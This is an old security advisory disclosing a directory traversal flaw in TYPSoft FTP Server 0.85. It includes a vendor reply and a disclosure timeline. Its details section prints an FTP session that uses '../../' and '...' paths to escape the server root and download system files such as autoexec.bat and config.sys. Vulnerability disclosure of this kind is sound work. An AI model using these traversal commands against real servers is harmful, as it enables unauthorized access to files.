----- Begin Hush Signed Message from [EMAIL PROTECTED] -----
Vulnerability in TYPSoft FTP Server
Overview
TYPSoft FTP Server v0.85 is an ftp server available from
http://www.webmasterfree.com and http://typsoft.n3.net. A vulnerability
exists which allows a remote attacker to break out of the ftp root using
relative paths (ie: '...').
Details
The following is an illustration of the problem:
% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220 TYPSoft FTP Server 0.85 ready...
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> pwd
257 "/C:/directory/directory/" is current directory.
ftp> get ../../autoexec.bat
200 Port command successful.
150 Opening data connection for ../../autoexec.bat.
226 Transfer complete.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
ftp> cd ..
501 CWD failed. No permission
ftp> cd ...
250 CWD command successful. "/C:/directory/directory/.../" is current directory.
ftp> pwd
257 "/C:/directory/directory/.../" is current directory.
ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 Transfer complete.
ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
ftp>
Solution
> Date: Sat, 24 Feb 2001 01:39:23 -0500
> Subject: Re: Vulnerability in TYPSoft FTP Server
> From: TYPSoft <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
>
> Hi
> I have try to fix this problem.
> I test I have made seem to be OK.
> Thanks for the report
>
> Marc
> TYPSoft
Unfortunately, I do not have the resources to verify this fix at
this time. Thus, I urge users to proceed with caution.
Vendor Status
TYPSoft was contacted via <[EMAIL PROTECTED]> on Wednesday, February
21, 2001.
- Joe Testa ( e-mail: [EMAIL PROTECTED] / AIM: LordSpankatron )
----- Begin Hush Signature v1.3 -----
CCyeaZ11wOzc4By+rx1GtdKkD9gDG1/WAGHJFUhNZz/sgpcfsBCSqSLWjwIoSl8Atqqv
k83hLlTNlsRS5rzSkS+7yx37hSlR5mwy/2VC0DYd6g8/vMUSp2uQ59wfxZjasWeSx3t/
sA61/cuAT30osMp9YCCy1i4+/7/ReyGJERQQtQIiLuVvN43EWcMVvTGmDJgOqvLErGVu
I4seQjpawANb/Nis9zJbKYjbBycaew5xGeZ8d51tyt8It5sO/Pf7+2lKBYinWk7tV75/
yrkEpVd23MXtn9xW0c+9GiwvUlUTyhKkfQe3crhHxJywTWhbq1MOp5pQMaksAm/87CQc
y8+ZrbDW8SWKh3ozKiot5CgK4gMd2jSbLJ/IUxY8A2GisMU96GyGUTsC7Jzmng9UG/mK
YlWtalAbucV/TJgHFyyy9zbmQ4X+TLez8ewrU6hXnOLwuW9K8Pgt1/2O99mdZMoU+Uuf
g1Obvd2TlDtRwk9MNQcriBktRi03WJIJtomI74GIx5TO
----- End Hush Signature v1.3 -----
This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
Free, encrypted, secure Web-based email at www.hushmail.com
